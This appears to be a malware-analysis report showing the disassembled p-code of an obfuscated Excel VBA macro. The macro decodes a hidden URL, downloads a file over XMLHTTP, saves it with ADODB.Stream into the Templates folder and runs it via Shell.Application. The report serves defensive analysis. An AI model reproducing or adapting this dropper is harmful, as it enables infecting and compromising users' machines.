' 	LitStr 0x006E " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥"
' 	St ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ 
' Line #2:
' 	LitStr 0x006E " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
' 	St BSpecialPathB 
' Line #3:
' 	StartForVariable 
' 	Ld Workbook_Open 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º 
' 	FnLen 
' 	For 
' Line #4:
' 	Ld ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ 
' 	Ld ¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º 
' 	Ld Workbook_Open 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	FnInStr 
' 	St id_0280 
' Line #5:
' 	Ld id_0280 
' 	LitDI2 0x0000 
' 	Gt 
' 	IfBlock 
' Line #6:
' 	Ld BSpecialPathB 
' 	Ld id_0280 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St id_0282 
' Line #7:
' 	Ld id_0284 
' 	Ld id_0282 
' 	Add 
' 	St id_0284 
' Line #8:
' 	ElseBlock 
' Line #9:
' 	Ld id_0284 
' 	Ld ¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º 
' 	Ld Workbook_Open 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	Add 
' 	St id_0284 
' Line #10:
' 	EndIfBlock 
' Line #11:
' 	StartForVariable 
' 	Next 
' Line #12:
' 	Ld id_0284 
' 	St ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤ 
' Line #13:
' 	EndFunc 
' Line #14:
' Line #15:
' Line #16:
' 	FuncDefn (Private Sub Chr())
' Line #17:
' 	Dim 
' 	VarDefn CreateObject (As Object)
' Line #18:
' 	Dim 
' 	VarDefn id_0286 (As String)
' Line #19:
' 	Dim 
' 	VarDefn ¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼ (As Integer)
' Line #20:
' 	LitDI2 0x0032 
' 	ArgsLd ¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹ 0x0001 
' 	LitDI2 0x0030 
' 	ArgsLd ¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹ 0x0001 
' 	Add 
' 	LitDI2 0x0030 
' 	ArgsLd ¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹ 0x0001 
' 	Add 
' 	St ¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼ 
' Line #21:
' Line #22:
' Line #23:
' 	SetStmt 
' 	LitStr 0x000D "WScript.Shell"
' 	ArgsLd ¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥ 0x0001 
' 	Set CreateObject 
' Line #24:
' 	LitStr 0x0009 "Templates"
' 	Ld CreateObject 
' 	ArgsMemLd ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯ 0x0001 
' 	St id_0286 
' Line #25:
' 	Dim 
' 	VarDefn «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³
' Line #26:
' 	Dim 
' 	VarDefn °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼
' Line #27:
' 	Dim 
' 	VarDefn ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾
' Line #28:
' 	Dim 
' 	VarDefn ¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹
' Line #29:
' 	Dim 
' 	VarDefn ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬
' Line #30:
' 	Dim 
' 	VarDefn ¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡ (As Integer)
' Line #31:
' 	Dim 
' 	VarDefn ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼
' Line #32:
' 	Dim 
' 	VarDefn ·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼
' Line #33:
' 	LitDI2 0x0001 
' 	St ¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡ 
' Line #34:
' Line #35:
' Line #36:
' Line #37:
' Line #38:
' 	SetStmt 
' 	LitStr 0x0011 "microsoft.xmlhttp"
' 	ArgsLd ¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥ 0x0001 
' 	Set ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ 
' Line #39:
' 	SetStmt 
' 	LitStr 0x0011 "Shell.Application"
' 	ArgsLd ¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥ 0x0001 
' 	Set ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬ 
' Line #40:
' Line #41:
' 	Ld id_0286 
' 	LitStr 0x000B "\N§KJââ.ÂÛÂ"
' 	ArgsLd ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤ 0x0001 
' 	Add 
' 	St ¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹ 
' Line #42:
' 	LitStr 0x0003 "get"
' 	LitStr 0x0070 "hÖÖÓÕ://ÅlÒÀÖvÒÀÖÄÅ.ÜdÅÕ.ÂÙ/ÁÂÙkÂÅÔgÖÒÃÃÄÁÂÀÃÅmÒÃÃÄkÂÅÔgÖÂÔ/ÂÖwÂÖjkdÅgjÂdÃlkkÖgÂÔkÖgÅÂÔÖhÂÔgÔgÂÔgÂ/ÕÂÔÛÁvÂÔ1.ÂÛÂ"
' 	ArgsLd ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤ 0x0001 
' 	LitVarSpecial (False)
' 	Ld ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ 
' 	ArgsMemCall Open 0x0003 
' Line #43:
' 	Ld ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ 
' 	ArgsMemCall Sheet1 0x0000 
' Line #44:
' 	Ld ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ 
' 	MemLd Sheet2 
' 	St °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ 
' Line #45:
' 	Ld ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ 
' 	MemLd Sheet3 
' 	LitDI2 0x00C8 
' 	Eq 
' 	IfBlock 
' Line #46:
' 	SetStmt 
' 	LitStr 0x000C "adodb.stream"
' 	ArgsLd ¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥ 0x0001 
' 	Set «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ 
' Line #47:
' 	Ld «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ 
' 	ArgsMemCall Open 0x0000 
' Line #48:
' 	Ld ¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡ 
' 	Ld «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ 
' 	MemSt Type 
' Line #49:
' 	Ld °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ 
' 	Ld «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ 
' 	ArgsMemCall Xor 0x0001 
' Line #50:
' 	Ld ¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹ 
' 	Ld ¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡ 
' 	Ld ¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡ 
' 	Add 
' 	Ld «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ 
' 	ArgsMemCall Workbook 0x0002 
' Line #51:
' 	Ld «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ 
' 	ArgsMemCall Close 0x0000 
' Line #52:
' 	EndIfBlock 
' Line #53:
' 	Ld ¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹ 
' 	Paren 
' 	Ld ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬ 
' 	ArgsMemCall Open 0x0001 
' Line #54:
' 	EndSub 
' Line #55:
' Line #56:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.